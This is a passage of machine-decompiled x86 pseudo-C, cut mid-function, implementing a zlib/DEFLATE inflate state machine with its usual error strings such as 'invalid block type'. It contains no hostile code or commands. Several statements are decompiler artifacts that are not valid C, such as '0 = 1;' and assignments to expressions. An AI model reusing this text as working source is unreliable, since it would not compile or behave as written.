                                                                                                          										__eflags =  *((intOrPtr*)(__ebx + 0xc)) - __eax;
                                                                                                          										if( *((intOrPtr*)(__ebx + 0xc)) == __eax) {
                                                                                                          											L316:
                                                                                                          											__eax =  *(__ebp - 0x1c);
                                                                                                          											 *(__esi + 0xc) =  *(__ebp - 0x1c);
                                                                                                          											__eax =  *(__ebp - 0x18);
                                                                                                          											 *(__esi + 0x10) =  *(__ebp - 0x18);
                                                                                                          											__eax =  *(__ebp - 8);
                                                                                                          											 *__esi =  *(__ebp - 8);
                                                                                                          											 *(__esi + 4) = __ecx;
                                                                                                          											 *(__ebx + 0x38) = __edx;
                                                                                                          											 *(__ebx + 0x3c) = __edi;
                                                                                                          											_push(2);
                                                                                                          											goto L137;
                                                                                                          										}
                                                                                                          										L146:
                                                                                                          										__eax = E00882E91(__eax, __eax, __eax);
                                                                                                          										__edx =  *(__ebp - 0xc);
                                                                                                          										__ecx =  *(__ebp - 4);
                                                                                                          										 *(__ebx + 0x18) = __eax;
                                                                                                          										 *(__esi + 0x30) = __eax;
                                                                                                          										 *__ebx = 0xb;
                                                                                                          										goto L147;
                                                                                                          									case 0xb:
                                                                                                          										L147:
                                                                                                          										__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 5;
                                                                                                          										if( *((intOrPtr*)(__ebp + 0xc)) == 5) {
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L148:
                                                                                                          										__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                          										if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										goto L149;
                                                                                                          									case 0xc:
                                                                                                          										L149:
                                                                                                          										__eflags =  *(__ebx + 4);
                                                                                                          										if( *(__ebx + 4) == 0) {
                                                                                                          											L151:
                                                                                                          											__eflags = __edi - 3;
                                                                                                          											if(__edi >= 3) {
                                                                                                          												L155:
                                                                                                          												__eax = __edx;
                                                                                                          												__edx = __edx >> 1;
                                                                                                          												 *(__ebx + 4) = __eax;
                                                                                                          												__edx = __edx & 0x00000003;
                                                                                                          												__eax = __edx & 0x00000003;
                                                                                                          												__eflags = __eax;
                                                                                                          												if(__eax == 0) {
                                                                                                          													L163:
                                                                                                          													 *__ebx = 0xd;
                                                                                                          													L164:
                                                                                                          													__edx = __edx >> 2;
                                                                                                          													__edi = __edi - 3;
                                                                                                          													L21:
                                                                                                          													 *(_t841 - 0xc) = _t822;
                                                                                                          													 *(_t841 - 0x10) = _t833;
                                                                                                          													goto L134;
                                                                                                          												}
                                                                                                          												L156:
                                                                                                          												__eax = __eax - 1;
                                                                                                          												__eflags = __eax;
                                                                                                          												if(__eax == 0) {
                                                                                                          													L161:
                                                                                                          													__eax = E00881718(__ebx);
                                                                                                          													 *__ebx = 0x13;
                                                                                                          													__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                          													if( *((intOrPtr*)(__ebp + 0xc)) != 6) {
                                                                                                          														goto L164;
                                                                                                          													}
                                                                                                          													L162:
                                                                                                          													__edx = __edx >> 2;
                                                                                                          													__edi = __edi - 3;
                                                                                                          													 *(__ebp - 0xc) = __edx;
                                                                                                          													goto L322;
                                                                                                          												}
                                                                                                          												L157:
                                                                                                          												__eax = __eax - 1;
                                                                                                          												__eflags = __eax;
                                                                                                          												if(__eax == 0) {
                                                                                                          													_push(0x10);
                                                                                                          													_pop(__eax);
                                                                                                          													 *__ebx = __eax;
                                                                                                          												} else {
                                                                                                          													__eax = __eax - 1;
                                                                                                          													__eflags = __eax;
                                                                                                          													if(__eax == 0) {
                                                                                                          														 *(__esi + 0x18) = "invalid block type";
                                                                                                          														 *__ebx = 0x1d;
                                                                                                          													}
                                                                                                          												}
                                                                                                          												goto L164;
                                                                                                          											}
                                                                                                          											L152:
                                                                                                          											__eax =  *(__ebp - 8);
                                                                                                          											while(1) {
                                                                                                          												L153:
                                                                                                          												__eflags = __ecx;
                                                                                                          												if(__ecx == 0) {
                                                                                                          													goto L322;
                                                                                                          												}
                                                                                                          												L154:
                                                                                                          												__eax =  *__eax & 0x000000ff;
                                                                                                          												 *(__ebp - 4) = __ecx;
                                                                                                          												__ecx = __edi;
                                                                                                          												__eax = __eax << __cl;
                                                                                                          												__edi = __edi + 8;
                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                          												__edx = __eax + __edx;
                                                                                                          												__eax =  *(__ebp - 8);
                                                                                                          												__eax =  *(__ebp - 8) + 1;
                                                                                                          												 *(__ebp - 0xc) = __edx;
                                                                                                          												 *(__ebp - 8) = __eax;
                                                                                                          												__eflags = __edi - 3;
                                                                                                          												if(__edi < 3) {
                                                                                                          													continue;
                                                                                                          												}
                                                                                                          												goto L155;
                                                                                                          											}
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L150:
                                                                                                          										__ecx = __edi;
                                                                                                          										 *__ebx = 0x1a;
                                                                                                          										__ecx = __edi & 0x00000007;
                                                                                                          										__edx = __edx >> __cl;
                                                                                                          										__edi = __edi - __ecx;
                                                                                                          										 *(__ebp - 0xc) = __edx;
                                                                                                          										 *(__ebp - 0x10) = __edi;
                                                                                                          										goto L134;
                                                                                                          									case 0xd:
                                                                                                          										goto L0;
                                                                                                          									case 0xe:
                                                                                                          										goto L171;
                                                                                                          									case 0xf:
                                                                                                          										goto L172;
                                                                                                          									case 0x10:
                                                                                                          										L176:
                                                                                                          										__eflags = __edi - 0xe;
                                                                                                          										if(__edi >= 0xe) {
                                                                                                          											L180:
                                                                                                          											__eax = __edx;
                                                                                                          											__edi = __edi - 0xe;
                                                                                                          											__eax = __edx & 0x0000001f;
                                                                                                          											__edx = __edx >> 5;
                                                                                                          											__eax = __eax + 0x101;
                                                                                                          											 *(__ebp - 0x10) = __edi;
                                                                                                          											 *(__ebx + 0x60) = __eax;
                                                                                                          											__eax = __edx;
                                                                                                          											__eax = __edx & 0x0000001f;
                                                                                                          											__edx = __edx >> 5;
                                                                                                          											 *(__ebx + 0x64) = __eax;
                                                                                                          											__eax = __edx;
                                                                                                          											__eax = __edx & 0x0000000f;
                                                                                                          											__edx = __edx >> 4;
                                                                                                          											__eax = __eax + 4;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											__eflags =  *(__ebx + 0x60) - 0x11e;
                                                                                                          											 *(__ebx + 0x5c) = __eax;
                                                                                                          											if( *(__ebx + 0x60) > 0x11e) {
                                                                                                          												L183:
                                                                                                          												 *(__esi + 0x18) = "too many length or distance symbols";
                                                                                                          												goto L31;
                                                                                                          											}
                                                                                                          											L181:
                                                                                                          											__eflags =  *(__ebx + 0x64) - 0x1e;
                                                                                                          											if( *(__ebx + 0x64) > 0x1e) {
                                                                                                          												goto L183;
                                                                                                          											}
                                                                                                          											L182:
                                                                                                          											 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
                                                                                                          											_push(0x11);
                                                                                                          											_pop(__eax);
                                                                                                          											 *__ebx = __eax;
                                                                                                          											goto L189;
                                                                                                          										}
                                                                                                          										L177:
                                                                                                          										__eax =  *(__ebp - 8);
                                                                                                          										while(1) {
                                                                                                          											L178:
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L179:
                                                                                                          											__eax =  *__eax & 0x000000ff;
                                                                                                          											 *(__ebp - 4) = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__eax = __eax << __cl;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__edx = __eax + __edx;
                                                                                                          											__eax =  *(__ebp - 8);
                                                                                                          											__eax =  *(__ebp - 8) + 1;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											 *(__ebp - 8) = __eax;
                                                                                                          											__eflags = __edi - 0xe;
                                                                                                          											if(__edi < 0xe) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L180;
                                                                                                          										}
                                                                                                          										goto L322;
                                                                                                          									case 0x11:
                                                                                                          										while(1) {
                                                                                                          											L189:
                                                                                                          											__eax =  *(__ebx + 0x68);
                                                                                                          											__eflags =  *(__ebx + 0x68) -  *(__ebx + 0x5c);
                                                                                                          											if( *(__ebx + 0x68) >=  *(__ebx + 0x5c)) {
                                                                                                          												break;
                                                                                                          											}
                                                                                                          											L184:
                                                                                                          											__eflags = __edi - 3;
                                                                                                          											if(__edi >= 3) {
                                                                                                          												L188:
                                                                                                          												__eax =  *(__ebx + 0x68);
                                                                                                          												__edx = __edx & 0x00000007;
                                                                                                          												__edx = __edx >> 3;
                                                                                                          												 *(__ebp - 0xc) = __edx;
                                                                                                          												__eax =  *(0x884908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
                                                                                                          												 *((short*)(__ebx + 0x70 + ( *(0x884908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                                          												 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                          												__edi = __edi - 3;
                                                                                                          												__eflags = __edi;
                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                          												 *(__ebp - 0x10) = __edi;
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											L185:
                                                                                                          											__eax =  *(__ebp - 8);
                                                                                                          											while(1) {
                                                                                                          												L186:
                                                                                                          												__eflags = __ecx;
                                                                                                          												if(__ecx == 0) {
                                                                                                          													goto L322;
                                                                                                          												}
                                                                                                          												L187:
                                                                                                          												__eax =  *__eax & 0x000000ff;
                                                                                                          												 *(__ebp - 4) = __ecx;
                                                                                                          												__ecx = __edi;
                                                                                                          												__eax = __eax << __cl;
                                                                                                          												__edi = __edi + 8;
                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                          												__edx = __eax + __edx;
                                                                                                          												__eax =  *(__ebp - 8);
                                                                                                          												__eax =  *(__ebp - 8) + 1;
                                                                                                          												 *(__ebp - 0xc) = __edx;
                                                                                                          												 *(__ebp - 8) = __eax;
                                                                                                          												__eflags = __edi - 3;
                                                                                                          												if(__edi < 3) {
                                                                                                          													continue;
                                                                                                          												}
                                                                                                          												goto L188;
                                                                                                          											}
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L190:
                                                                                                          										while(1) {
                                                                                                          											L192:
                                                                                                          											__eflags =  *(__ebx + 0x68) - 0x13;
                                                                                                          											if( *(__ebx + 0x68) >= 0x13) {
                                                                                                          												break;
                                                                                                          											}
                                                                                                          											L191:
                                                                                                          											__eax =  *(__ebx + 0x68);
                                                                                                          											__ecx = 0;
                                                                                                          											__eax =  *(0x884908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
                                                                                                          											 *((short*)(__ebx + 0x70 + ( *(0x884908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                                          											_t368 = __ebx + 0x68;
                                                                                                          											 *_t368 =  *(__ebx + 0x68) + 1;
                                                                                                          											__eflags =  *_t368;
                                                                                                          										}
                                                                                                          										L193:
                                                                                                          										__eax = __ebx + 0x530;
                                                                                                          										__ecx = __ebx + 0x6c;
                                                                                                          										 *(__ebx + 0x4c) = __eax;
                                                                                                          										 *(__ebx + 0x6c) = __eax;
                                                                                                          										__edx = __ebx + 0x54;
                                                                                                          										__eax = __ebx + 0x2f0;
                                                                                                          										 *(__ebx + 0x54) = 7;
                                                                                                          										__eax = __ebx + 0x70;
                                                                                                          										__eax = E008833B4(0, __ebx + 0x70, 0x13, __ecx, __edx, __ebx + 0x2f0);
                                                                                                          										 *(__ebp - 0x20) = __eax;
                                                                                                          										__eflags = __eax;
                                                                                                          										if(__eax == 0) {
                                                                                                          											L196:
                                                                                                          											 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
                                                                                                          											 *__ebx = 0x12;
                                                                                                          											goto L224;
                                                                                                          										}
                                                                                                          										L194:
                                                                                                          										 *(__esi + 0x18) = "invalid code lengths set";
                                                                                                          										goto L195;
                                                                                                          									case 0x12:
                                                                                                          										while(1) {
                                                                                                          											L224:
                                                                                                          											 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                          											__ecx =  *(__ebx + 0x68);
                                                                                                          											 *(__ebp - 0x2c) = __ecx;
                                                                                                          											__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                          											if(__ecx <  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
                                                                                                          												goto L199;
                                                                                                          											} else {
                                                                                                          												break;
                                                                                                          											}
                                                                                                          											while(1) {
                                                                                                          												L199:
                                                                                                          												__ecx =  *(__ebx + 0x54);
                                                                                                          												__edx = 0;
                                                                                                          												__eax =  *(__ebx + 0x4c);
                                                                                                          												1 = 1 << __cl;
                                                                                                          												__edx = (1 << __cl) - 1;
                                                                                                          												__edx = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
                                                                                                          												__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) * 4);
                                                                                                          												__eax = __eax >> 8;
                                                                                                          												__ecx = __cl & 0x000000ff;
                                                                                                          												 *(__ebp - 0x34) = __eax;
                                                                                                          												__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                          												if((__cl & 0x000000ff) <= __edi) {
                                                                                                          													break;
                                                                                                          												}
                                                                                                          												L197:
                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                          												__eflags = __ecx;
                                                                                                          												if(__ecx == 0) {
                                                                                                          													goto L323;
                                                                                                          												}
                                                                                                          												L198:
                                                                                                          												__edx =  *(__ebp - 8);
                                                                                                          												 *(__ebp - 4) = __ecx;
                                                                                                          												__ecx = __edi;
                                                                                                          												 *__edx & 0x000000ff = ( *__edx & 0x000000ff) << __cl;
                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) + (( *__edx & 0x000000ff) << __cl);
                                                                                                          												 *(__ebp - 8) = __edx;
                                                                                                          												__edi = __edi + 8;
                                                                                                          												__eflags = __edi;
                                                                                                          											}
                                                                                                          											L200:
                                                                                                          											__edx = __eax;
                                                                                                          											_push(0x10);
                                                                                                          											__edx = __eax >> 0x10;
                                                                                                          											_pop(__ecx);
                                                                                                          											__eflags = __dx - __cx;
                                                                                                          											if(__eflags >= 0) {
                                                                                                          												L202:
                                                                                                          												if(__eflags != 0) {
                                                                                                          													L208:
                                                                                                          													__edx =  *(__ebp - 0xc);
                                                                                                          													_push(0x11);
                                                                                                          													_pop(__ecx);
                                                                                                          													__eflags =  *(__ebp - 0x32) - __cx;
                                                                                                          													__ecx = __ah & 0x000000ff;
                                                                                                          													if( *(__ebp - 0x32) != __cx) {
                                                                                                          														L214:
                                                                                                          														 *(__ebp - 0x10) = __ecx;
                                                                                                          														while(1) {
                                                                                                          															L215:
                                                                                                          															_t432 = __ecx + 7; // 0x18
                                                                                                          															__eax = _t432;
                                                                                                          															__eflags = __edi - _t432;
                                                                                                          															if(__edi >= _t432) {
                                                                                                          																break;
                                                                                                          															}
                                                                                                          															L216:
                                                                                                          															__ecx =  *(__ebp - 4);
                                                                                                          															__eflags = __ecx;
                                                                                                          															if(__ecx == 0) {
                                                                                                          																goto L323;
                                                                                                          															}
                                                                                                          															L217:
                                                                                                          															__eax =  *(__ebp - 8);
                                                                                                          															 *(__ebp - 4) = __ecx;
                                                                                                          															__ecx = __edi;
                                                                                                          															 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                          															__ecx =  *(__ebp - 0x10);
                                                                                                          															__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                          															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                          															__edi = __edi + 8;
                                                                                                          															 *(__ebp - 0xc) = __edx;
                                                                                                          														}
                                                                                                          														L218:
                                                                                                          														__edx = __edx >> __cl;
                                                                                                          														__ecx = __edx;
                                                                                                          														__edx = __edx >> 7;
                                                                                                          														__ecx = __ecx & 0x0000007f;
                                                                                                          														_push(0xfffffff9);
                                                                                                          														_pop(__eax);
                                                                                                          														__ecx = __ecx + 0xb;
                                                                                                          														__eax = __eax -  *(__ebp - 0x10);
                                                                                                          														__eflags = __eax;
                                                                                                          														L219:
                                                                                                          														 *(__ebp - 0x34) =  *(__ebp - 0x34) & 0x00000000;
                                                                                                          														__edi = __edi + __eax;
                                                                                                          														__eflags = __edi;
                                                                                                          														L220:
                                                                                                          														 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                          														 *(__ebp - 0x30) = __ecx;
                                                                                                          														__ecx = __ecx +  *(__ebp - 0x2c);
                                                                                                          														 *(__ebp - 0xc) = __edx;
                                                                                                          														 *(__ebp - 0x10) = __edi;
                                                                                                          														__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                          														if(__ecx >  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
                                                                                                          															L227:
                                                                                                          															 *(__esi + 0x18) = "invalid bit length repeat";
                                                                                                          															 *__ebx = 0x1d;
                                                                                                          															L228:
                                                                                                          															__eflags =  *__ebx - 0x1d;
                                                                                                          															if( *__ebx == 0x1d) {
                                                                                                          																L133:
                                                                                                          																__edx =  *(__ebp - 0xc);
                                                                                                          																goto L134;
                                                                                                          															}
                                                                                                          															L229:
                                                                                                          															__eax = 0;
                                                                                                          															__eflags =  *((intOrPtr*)(__ebx + 0x270)) - __ax;
                                                                                                          															if( *((intOrPtr*)(__ebx + 0x270)) != __ax) {
                                                                                                          																L231:
                                                                                                          																__eax = __ebx + 0x530;
                                                                                                          																__ecx = __ebx + 0x6c;
                                                                                                          																 *(__ebx + 0x4c) = __eax;
                                                                                                          																 *(__ebx + 0x6c) = __eax;
                                                                                                          																__edx = __ebx + 0x54;
                                                                                                          																__eax = __ebx + 0x2f0;
                                                                                                          																 *(__ebx + 0x54) = 9;
                                                                                                          																__eax = __ebx + 0x70;
                                                                                                          																__eax = E008833B4(1, __ebx + 0x70,  *(__ebx + 0x60), __ecx, __edx, __ebx + 0x2f0);
                                                                                                          																 *(__ebp - 0x20) = __eax;
                                                                                                          																__eflags = __eax;
                                                                                                          																if(__eax == 0) {
                                                                                                          																	L233:
                                                                                                          																	__ecx = __ebx + 0x6c;
                                                                                                          																	__eax =  *__ecx;
                                                                                                          																	__edx = __ebx + 0x58;
                                                                                                          																	 *(__ebx + 0x50) =  *__ecx;
                                                                                                          																	__ebx + 0x2f0 =  *(__ebx + 0x60);
                                                                                                          																	__eax =  *(__ebx + 0x60) + 0x38;
                                                                                                          																	 *(__ebx + 0x58) = 6;
                                                                                                          																	__eax = __ebx + ( *(__ebx + 0x60) + 0x38) * 2;
                                                                                                          																	__eax = E008833B4(2, __ebx + ( *(__ebx + 0x60) + 0x38) * 2,  *(__ebx + 0x64), __ecx, __edx, __ebx + 0x2f0);
                                                                                                          																	 *(__ebp - 0x20) = __eax;
                                                                                                          																	__eflags = __eax;
                                                                                                          																	if(__eax == 0) {
                                                                                                          																		L235:
                                                                                                          																		__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                          																		__ecx =  *(__ebp - 4);
                                                                                                          																		 *__ebx = 0x13;
                                                                                                          																		if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
                                                                                                          																			goto L323;
                                                                                                          																		}
                                                                                                          																		L236:
                                                                                                          																		__edx =  *(__ebp - 0xc);
                                                                                                          																		goto L237;
                                                                                                          																	}
                                                                                                          																	L234:
                                                                                                          																	 *(__esi + 0x18) = "invalid distances set";
                                                                                                          																	L195:
                                                                                                          																	 *__ebx = 0x1d;
                                                                                                          																	goto L133;
                                                                                                          																}
                                                                                                          																L232:
                                                                                                          																 *(__esi + 0x18) = "invalid literal/lengths set";
                                                                                                          																goto L195;
                                                                                                          															}
                                                                                                          															L230:
                                                                                                          															 *(__esi + 0x18) = "invalid code -- missing end-of-block";
                                                                                                          															goto L195;
                                                                                                          														}
                                                                                                          														L221:
                                                                                                          														__ecx =  *(__ebp - 0x30);
                                                                                                          														__eflags = __ecx;
                                                                                                          														if(__ecx == 0) {
                                                                                                          															continue;
                                                                                                          														}
                                                                                                          														L222:
                                                                                                          														__edx =  *(__ebp - 0x34);
                                                                                                          														do {
                                                                                                          															L223:
                                                                                                          															__eax =  *(__ebx + 0x68);
                                                                                                          															 *((short*)(__ebx + 0x70 +  *(__ebx + 0x68) * 2)) = __dx;
                                                                                                          															 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                          															__ecx = __ecx - 1;
                                                                                                          															__eflags = __ecx;
                                                                                                          														} while (__ecx != 0);
                                                                                                          														continue;
                                                                                                          													}
                                                                                                          													L209:
                                                                                                          													 *(__ebp - 0x10) = __ecx;
                                                                                                          													while(1) {
                                                                                                          														L210:
                                                                                                          														_t422 = __ecx + 3; // 0x14
                                                                                                          														__eax = _t422;
                                                                                                          														__eflags = __edi - _t422;
                                                                                                          														if(__edi >= _t422) {
                                                                                                          															break;
                                                                                                          														}
                                                                                                          														L211:
                                                                                                          														__ecx =  *(__ebp - 4);
                                                                                                          														__eflags = __ecx;
                                                                                                          														if(__ecx == 0) {
                                                                                                          															goto L323;
                                                                                                          														}
                                                                                                          														L212:
                                                                                                          														__eax =  *(__ebp - 8);
                                                                                                          														 *(__ebp - 4) = __ecx;
                                                                                                          														__ecx = __edi;
                                                                                                          														 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                          														__ecx =  *(__ebp - 0x10);
                                                                                                          														__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                          														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                          														__edi = __edi + 8;
                                                                                                          														 *(__ebp - 0xc) = __edx;
                                                                                                          													}
                                                                                                          													L213:
                                                                                                          													__edx = __edx >> __cl;
                                                                                                          													__ecx = __edx;
                                                                                                          													__edx = __edx >> 3;
                                                                                                          													__ecx = __ecx & 0x00000007;
                                                                                                          													_push(0xfffffffd);
                                                                                                          													_pop(__eax);
                                                                                                          													__ecx = __ecx + 3;
                                                                                                          													__eax = __eax -  *(__ebp - 0x10);
                                                                                                          													goto L219;
                                                                                                          												}
                                                                                                          												L203:
                                                                                                          												__eax = __eax >> 8;
                                                                                                          												__ecx = __cl & 0x000000ff;
                                                                                                          												__ecx = (__cl & 0x000000ff) + 2;
                                                                                                          												 *(__ebp - 0x34) = __ecx;
                                                                                                          												__eflags = __edi - __ecx;
                                                                                                          												if(__edi >= __ecx) {
                                                                                                          													L206:
                                                                                                          													__edx =  *(__ebp - 0xc);
                                                                                                          													__ecx = __ah & 0x000000ff;
                                                                                                          													__eax =  *(__ebp - 0x2c);
                                                                                                          													__edi = __edi - __ecx;
                                                                                                          													__edx =  *(__ebp - 0xc) >> __cl;
                                                                                                          													 *(__ebp - 0xc) = __edx;
                                                                                                          													 *(__ebp - 0x10) = __edi;
                                                                                                          													__eflags = __eax;
                                                                                                          													if(__eax == 0) {
                                                                                                          														L226:
                                                                                                          														 *(__esi + 0x18) = "invalid bit length repeat";
                                                                                                          														goto L17;
                                                                                                          													}
                                                                                                          													L207:
                                                                                                          													__eax =  *(__ebx + 0x6e + __eax * 2) & 0x0000ffff;
                                                                                                          													__ecx = __edx;
                                                                                                          													__ecx = __edx & 0x00000003;
                                                                                                          													__edx = __edx >> 2;
                                                                                                          													__ecx = __ecx + 3;
                                                                                                          													 *(__ebp - 0x34) = __eax;
                                                                                                          													__edi = __edi - 2;
                                                                                                          													goto L220;
                                                                                                          												} else {
                                                                                                          													goto L204;
                                                                                                          												}
                                                                                                          												while(1) {
                                                                                                          													L204:
                                                                                                          													__ecx =  *(__ebp - 4);
                                                                                                          													__eflags = __ecx;
                                                                                                          													if(__ecx == 0) {
                                                                                                          														goto L323;
                                                                                                          													}
                                                                                                          													L205:
                                                                                                          													 *(__ebp - 4) = __ecx;
                                                                                                          													__ecx =  *(__ebp - 8);
                                                                                                          													__edx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                          													__ecx = __edi;
                                                                                                          													__edx = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                          													__edi = __edi + 8;
                                                                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                          													 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                          													__eflags = __edi -  *(__ebp - 0x34);
                                                                                                          													if(__edi <  *(__ebp - 0x34)) {
                                                                                                          														continue;
                                                                                                          													}
                                                                                                          													goto L206;
                                                                                                          												}
                                                                                                          												goto L323;
                                                                                                          											}
                                                                                                          											L201:
                                                                                                          											__eax = __eax >> 8;
                                                                                                          											__ecx = __al & 0x000000ff;
                                                                                                          											__eax =  *(__ebp - 0x2c);
                                                                                                          											__edi = __edi - (__al & 0x000000ff);
                                                                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) >> __cl;
                                                                                                          											 *(__ebp - 0x10) = __edi;
                                                                                                          											 *((short*)(__ebx + 0x70 +  *(__ebp - 0x2c) * 2)) = __dx;
                                                                                                          											 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                          										}
                                                                                                          										L225:
                                                                                                          										goto L228;
                                                                                                          									case 0x13:
                                                                                                          										L237:
                                                                                                          										 *__ebx = 0x14;
                                                                                                          										goto L238;
                                                                                                          									case 0x14:
                                                                                                          										L238:
                                                                                                          										__eflags = __ecx - 6;
                                                                                                          										if(__ecx < 6) {
                                                                                                          											L242:
                                                                                                          											__eax =  *(__ebx + 0x4c);
                                                                                                          											__ecx =  *(__ebx + 0x54);
                                                                                                          											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) & 0x00000000;
                                                                                                          											 *(__ebp - 0x30) =  *(__ebx + 0x4c);
                                                                                                          											0 = 1;
                                                                                                          											__eax = 1 << __cl;
                                                                                                          											__ecx =  *(__ebx + 0x4c);
                                                                                                          											__eax = (1 << __cl) - 1;
                                                                                                          											__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                          											__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & __edx) * 4);
                                                                                                          											while(1) {
                                                                                                          												L245:
                                                                                                          												__eax = __eax >> 8;
                                                                                                          												__ecx = __cl & 0x000000ff;
                                                                                                          												__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                          												if((__cl & 0x000000ff) <= __edi) {
                                                                                                          													break;
                                                                                                          												}
                                                                                                          												L243:
                                                                                                          												__ecx =  *(__ebp - 4);
                                                                                                          												__eflags = __ecx;
                                                                                                          												if(__ecx == 0) {
                                                                                                          													goto L323;
                                                                                                          												}
                                                                                                          												L244:
                                                                                                          												__eax =  *(__ebp - 8);
                                                                                                          												 *(__ebp - 4) = __ecx;
                                                                                                          												__ecx = __edi;
                                                                                                          												__edi = __edi + 8;
                                                                                                          												 *(__ebp - 0x10) = __edi;
                                                                                                          												 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                          												__ecx =  *(__ebx + 0x54);
                                                                                                          												__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                          												 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                          												__eax =  *(__ebx + 0x4c);
                                                                                                          												 *(__ebp - 0xc) = __edx;
                                                                                                          												0 = 1;
                                                                                                          												1 << __cl = (1 << __cl) - 1;
                                                                                                          												__edx = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
                                                                                                          												__eflags = 1;
                                                                                                          												__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) * 4);
                                                                                                          												__edx =  *(__ebp - 0xc);
                                                                                                          											}
                                                                                                          											L246:
                                                                                                          											__eflags = __al;
                                                                                                          											if(__al == 0) {
                                                                                                          												L252:
                                                                                                          												__eax = __eax >> 8;
                                                                                                          												__ecx = __cl & 0x000000ff;
                                                                                                          												 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                          												__edi = __edi - __ecx;
                                                                                                          												__edx = __edx >> __cl;
                                                                                                          												__ecx = __eax;
                                                                                                          												__ecx = __eax >> 0x10;
                                                                                                          												 *(__ebp - 0xc) = __edx;
                                                                                                          												 *(__ebp - 0x10) = __edi;
                                                                                                          												 *(__ebx + 0x40) = __ecx;
                                                                                                          												__eflags = __al;
                                                                                                          												if(__al != 0) {
                                                                                                          													L254:
                                                                                                          													__eflags = __al & 0x00000020;
                                                                                                          													if((__al & 0x00000020) == 0) {
                                                                                                          														L256:
                                                                                                          														__ecx =  *(__ebp - 4);
                                                                                                          														__eflags = __al & 0x00000040;
                                                                                                          														if((__al & 0x00000040) == 0) {
                                                                                                          															L258:
                                                                                                          															__eax = __al & 0x000000ff;
                                                                                                          															__eax = __al & 0xf;
                                                                                                          															__eflags = __eax;
                                                                                                          															 *__ebx = 0x15;
                                                                                                          															 *(__ebx + 0x48) = __eax;
                                                                                                          															goto L259;
                                                                                                          														}
                                                                                                          														L257:
                                                                                                          														 *(__esi + 0x18) = "invalid literal/length code";
                                                                                                          														L31:
                                                                                                          														 *__ebx = 0x1d;
                                                                                                          														goto L135;
                                                                                                          													}
                                                                                                          													L255:
                                                                                                          													 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
                                                                                                          													 *__ebx = 0xb;
                                                                                                          													goto L134;
                                                                                                          												}
                                                                                                          												L253:
                                                                                                          												 *__ebx = 0x19;
                                                                                                          												goto L134;
                                                                                                          											}
                                                                                                          											L247:
